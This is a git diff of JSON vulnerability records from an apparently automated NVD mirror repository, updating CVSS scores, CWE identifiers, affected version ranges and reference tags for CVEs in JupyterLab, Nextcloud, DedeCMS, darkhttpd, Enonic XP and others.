"value": "Nextcloud User Saml es una aplicaci\u00f3n para autenticar a los usuarios de Nextcloud mediante SAML. En las versiones afectadas, a los usuarios se les puede proporcionar un enlace al servidor de Nextcloud y terminar en un servidor de terceros no controlado. Se recomienda actualizar la aplicaci\u00f3n User Saml a la versi\u00f3n 5.1.5, 5.2.5 o 6.0.1. No se conocen workarounds para este problema."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
@ -46,22 +70,66 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:nextcloud:sso_\\&_saml_authentication:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.0.0",
"versionEndExcluding": "5.1.5",
"matchCriteriaId": "68724AAA-D837-4365-88F2-835D518A1805"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:nextcloud:sso_\\&_saml_authentication:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.2.0",
"versionEndExcluding": "5.2.5",
"matchCriteriaId": "8F52CDDE-DE98-4150-B3A1-1FB15C6A0F19"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:nextcloud:sso_\\&_saml_authentication:6.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "85B7A2B1-195F-4C8C-8521-E6C140A79B7A"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-622q-xhfr-xmv7",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://github.com/nextcloud/user_saml/commit/b184304a476deeba36e92b70562d5de7c2f85f8a",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/nextcloud/user_saml/pull/788",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://hackerone.com/reports/2263044",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
]
}
]
}

74
CVE-2024/CVE-2024-224xx/CVE-2024-22420.json
View File

@ -2,16 +2,40 @@
"id": "CVE-2024-22420",
"sourceIdentifier": "security-advisories@github.com",
"published": "2024-01-19T21:15:09.667",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:12:04.627",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension."
},
{
"lang": "es",
"value": "JupyterLab es un entorno extensible para inform\u00e1tica interactiva y reproducible, basado en Jupyter Notebook y Architecture. Esta vulnerabilidad depende de la interacci\u00f3n del usuario al abrir un archivo Markdown malicioso utilizando la funci\u00f3n de vista previa de JupyterLab. Un usuario malintencionado puede acceder a cualquier dato a los que tenga acceso el usuario atacado, as\u00ed como realizar solicitudes arbitrarias actuando como el usuario atacado. Se ha parcheado la versi\u00f3n 4.0.11 de JupyterLab. Se recomienda a los usuarios que actualicen. Los usuarios que no puedan actualizar deben desactivar la extensi\u00f3n de la tabla de contenido."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
@ -35,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
@ -46,14 +80,46 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:jupyter:jupyterlab:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.0.0",
"versionEndExcluding": "4.0.11",
"matchCriteriaId": "98056E64-C6C4-498A-9C3F-67A7F4F11261"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:*",
"versionStartIncluding": "7.0.0",
"versionEndExcluding": "7.0.7",
"matchCriteriaId": "EF4CC1C2-B78B-466A-ACDE-4604DE69D4FD"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
]
}
]
}

70
CVE-2024/CVE-2024-224xx/CVE-2024-22421.json
View File

@ -2,16 +2,40 @@
"id": "CVE-2024-22421",
"sourceIdentifier": "security-advisories@github.com",
"published": "2024-01-19T21:15:09.870",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:15:23.507",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix."
},
{
"lang": "es",
"value": "JupyterLab es un entorno extensible para inform\u00e1tica interactiva y reproducible, basado en Jupyter Notebook y Architecture. Los usuarios de JupyterLab que hacen clic en un enlace malicioso pueden exponer sus tokens de \"Autorizaci\u00f3n\" y \"XSRFToken\" a un tercero cuando ejecutan una versi\u00f3n anterior de \"jupyter-server\". Las versiones 4.1.0b2, 4.0.11 y 3.6.7 de JupyterLab est\u00e1n parcheadas. No se ha identificado ning\u00fan workaround; sin embargo, los usuarios deben asegurarse de actualizar `jupyter-server` a la versi\u00f3n 2.7.2 o posterior, que incluye una soluci\u00f3n de vulnerabilidad de redireccionamiento."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
@ -50,14 +74,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:jupyter:jupyterlab:*:*:*:*:*:*:*:*",
"versionEndExcluding": "3.6.7",
"matchCriteriaId": "6AB04D05-8A11-4C88-A8BC-654A2A735313"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:jupyter:jupyterlab:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.0.0",
"versionEndExcluding": "4.0.11",
"matchCriteriaId": "98056E64-C6C4-498A-9C3F-67A7F4F11261"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:*",
"versionStartIncluding": "7.0.0",
"versionEndExcluding": "7.0.7",
"matchCriteriaId": "EF4CC1C2-B78B-466A-ACDE-4604DE69D4FD"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
]
}
]
}

69
CVE-2024/CVE-2024-228xx/CVE-2024-22895.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2024-22895",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-22T15:15:09.067",
"lastModified": "2024-01-22T19:10:26.333",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:34:53.417",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php."
},
{
"lang": "es",
"value": "DedeCMS 5.7.112 tiene una vulnerabilidad de carga de archivos a trav\u00e9s de uploads/dede/module_upload.php."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-434"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:dedecms:dedecms:5.7.112:*:*:*:*:*:*:*",
"matchCriteriaId": "A03BA3DE-8692-483B-AD78-AC288D0250DD"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/zzq66/cve5",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mitigation",
"Third Party Advisory"
]
}
]
}

58
CVE-2024/CVE-2024-233xx/CVE-2024-23329.json
View File

@ -2,16 +2,40 @@
"id": "CVE-2024-23329",
"sourceIdentifier": "security-advisories@github.com",
"published": "2024-01-19T20:15:13.827",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:19:59.393",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": " changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability."
},
{
"lang": "es",
"value": "changetection.io es una herramienta de c\u00f3digo abierto dise\u00f1ada para monitorizar sitios web en busca de cambios de contenido. En las versiones afectadas, cualquier usuario no autorizado puede acceder al endpoint API `/api/v1/watch//history`. Como resultado, cualquier usuario no autorizado puede comprobar su historial de reproducciones. Sin embargo, debido a que la parte no autorizada primero necesita conocer un UUID de vigilancia, y el punto final del historial de vigilancia solo devuelve rutas a la instant\u00e1nea en el servidor, el impacto en la privacidad de los datos de los usuarios es m\u00ednimo. Este problema se solucion\u00f3 en la versi\u00f3n 0.45.13. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.2,
"impactScore": 1.4
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
@ -46,14 +70,40 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*",
"versionStartIncluding": "0.39.14",
"versionEndExcluding": "0.45.13",
"matchCriteriaId": "2C57D18E-669F-4D21-BDBE-25B6CD057DB0"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
]
}
]
}

127
CVE-2024/CVE-2024-236xx/CVE-2024-23679.json
View File

@ -2,16 +2,53 @@
"id": "CVE-2024-23679",
"sourceIdentifier": "disclosure@vulncheck.com",
"published": "2024-01-19T21:15:10.073",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:12:45.117",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.\n\n"
},
{
"lang": "es",
"value": "Las versiones de Enonic XP inferiores a 7.7.4 son vulnerables a un problema de reparaci\u00f3n de sesi\u00f3n. Un atacante remoto y no autenticado puede utilizar sesiones anteriores debido a la falta de atributos de sesi\u00f3n invalidantes."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-384"
}
]
},
{
"source": "disclosure@vulncheck.com",
"type": "Secondary",
@ -23,34 +60,104 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:*:*:*:*:*:*:*:*",
"versionEndExcluding": "7.7.4",
"matchCriteriaId": "3FC6521F-C0B8-4FE8-BE06-FAB57CFFE61A"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:7.8.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "0231ECC2-744B-4441-942B-514C943F7294"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:7.8.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "DD92F3AC-0C60-4588-B5DE-3488F7B38C18"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:7.8.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "7B807EF9-DADE-4C67-8AAF-E29C70D8D32F"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:7.8.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "0BB4FF1C-13D7-4385-A4EB-27750E88AE3B"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:7.8.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "890C984E-B1AD-4213-B355-DB26E6B1BE8D"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:enonic:xp:7.8.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "E156CC35-DC76-463E-8882-86C36814976E"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/advisories/GHSA-4m5p-5w5w-3jcf",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/enonic/xp/issues/9253",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Issue Tracking"
]
},
{
"url": "https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Patch",
"Vendor Advisory"
]
},
{
"url": "https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Third Party Advisory"
]
}
]
}

85
CVE-2024/CVE-2024-236xx/CVE-2024-23680.json
View File

@ -2,16 +2,53 @@
"id": "CVE-2024-23680",
"sourceIdentifier": "disclosure@vulncheck.com",
"published": "2024-01-19T21:15:10.140",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:08:47.817",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures. \n\n\n"
},
{
"lang": "es",
"value": "AWS Encryption SDK para Java, versiones 2.0.0 a 2.2.0 y anteriores a 1.9.0, valida incorrectamente algunas firmas ECDSA no v\u00e1lidas."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-347"
}
]
},
{
"source": "disclosure@vulncheck.com",
"type": "Secondary",
@ -23,18 +60,54 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:amazon:aws_encryption_sdk:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.9.0",
"matchCriteriaId": "E6118DB4-8FBA-4131-A530-12541D73B90D"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:amazon:aws_encryption_sdk:*:*:*:*:*:*:*:*",
"versionStartIncluding": "2.0.0",
"versionEndExcluding": "2.2.0",
"matchCriteriaId": "003A202C-299B-4807-AD02-C37D5F933F4A"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/advisories/GHSA-55xh-53m6-936r",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Patch",
"Third Party Advisory"
]
},
{
"url": "https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Patch",
"Vendor Advisory"
]
},
{
"url": "https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r",
"source": "disclosure@vulncheck.com"
"source": "disclosure@vulncheck.com",
"tags": [
"Third Party Advisory"
]
}
]
}

74
CVE-2024/CVE-2024-237xx/CVE-2024-23768.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-23768",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-22T03:15:08.203",
"lastModified": "2024-01-22T14:01:09.553",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:15:05.400",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
},
{
"source": "cve@mitre.org",
"type": "Secondary",
@ -38,10 +58,58 @@
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-22"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:dremio:dremio:*:*:*:*:*:*:*:*",
"versionStartIncluding": "22.0.0",
"versionEndExcluding": "22.2.3",
"matchCriteriaId": "6E0467E7-C667-4595-8094-5F18CCF72192"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:dremio:dremio:*:*:*:*:*:*:*:*",
"versionStartIncluding": "23.0.0",
"versionEndExcluding": "23.2.4",
"matchCriteriaId": "EFF5F865-AD00-4E6D-B888-6EE8AF6E7971"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:dremio:dremio:*:*:*:*:*:*:*:*",
"versionStartIncluding": "24.0.0",
"versionEndExcluding": "24.3.1",
"matchCriteriaId": "ECA6987B-10A4-46C6-A99B-2474B40676D9"
}
]
}
]
}
],
"references": [
{
"url": "https://docs.dremio.com/current/reference/bulletins/2024-01-12-01",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
]
}
]
}

75
CVE-2024/CVE-2024-237xx/CVE-2024-23770.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-23770",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-22T04:15:07.670",
"lastModified": "2024-01-25T12:15:46.870",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:18:29.190",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,19 +14,82 @@
"value": "darkhttpd hasta 1.15 permite a los usuarios locales descubrir credenciales (para --auth) enumerando procesos y sus argumentos."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:unix4lyfe:darkhttpd:*:*:*:*:*:*:*:*",
"versionEndIncluding": "1.15",
"matchCriteriaId": "2AB81BE1-0454-4EA9-BB4C-90097B787823"
}
]
}
]
}
],
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/25/1",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "https://github.com/emikulic/darkhttpd/commit/2b339828b2a42a5fda105ea84934957a7d23e35d",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Patch"
]
}
]
}

75
CVE-2024/CVE-2024-237xx/CVE-2024-23771.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-23771",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-22T04:15:07.723",
"lastModified": "2024-01-25T12:15:46.917",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:24:40.873",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,19 +14,82 @@
"value": "darkhttpd anterior a 1.15 usa strcmp (que no es un tiempo constante) para verificar la autenticaci\u00f3n, lo que facilita a atacantes remotos eludir la autenticaci\u00f3n a trav\u00e9s de un canal lateral de temporizaci\u00f3n."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-203"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:unix4lyfe:darkhttpd:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.15",
"matchCriteriaId": "1499A7FE-CFCC-43D4-AC4A-9484D700C7F6"
}
]
}
]
}
],
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/25/1",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "https://github.com/emikulic/darkhttpd/commit/f477619d49f3c4de9ad59bd194265a48ddc03f04",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Product"
]
}
]
}

77
README.md
View File

@ -9,13 +9,13 @@ Repository synchronizes with the NVD every 2 hours.
### Last Repository Update
```plain
2024-01-26T19:00:25.670577+00:00
2024-01-26T21:00:25.271575+00:00
```
### Most recent CVE Modification Timestamp synchronized with NVD
```plain
2024-01-26T19:00:06.617000+00:00
2024-01-26T20:55:37.543000+00:00
```
### Last Data Feed Release
@ -29,55 +29,50 @@ Download and Changelog: [Click](https://github.com/fkie-cad/nvd-json-data-feeds/
### Total Number of included CVEs
```plain
236939
236945
```
### CVEs added in the last Commit
Recently added CVEs: `11`
Recently added CVEs: `6`
* [CVE-2024-0931](CVE-2024/CVE-2024-09xx/CVE-2024-0931.json) (`2024-01-26T17:15:10.617`)
* [CVE-2024-0932](CVE-2024/CVE-2024-09xx/CVE-2024-0932.json) (`2024-01-26T17:15:11.050`)
* [CVE-2024-0933](CVE-2024/CVE-2024-09xx/CVE-2024-0933.json) (`2024-01-26T17:15:11.340`)
* [CVE-2024-0936](CVE-2024/CVE-2024-09xx/CVE-2024-0936.json) (`2024-01-26T17:15:11.853`)
* [CVE-2024-23820](CVE-2024/CVE-2024-238xx/CVE-2024-23820.json) (`2024-01-26T17:15:13.287`)
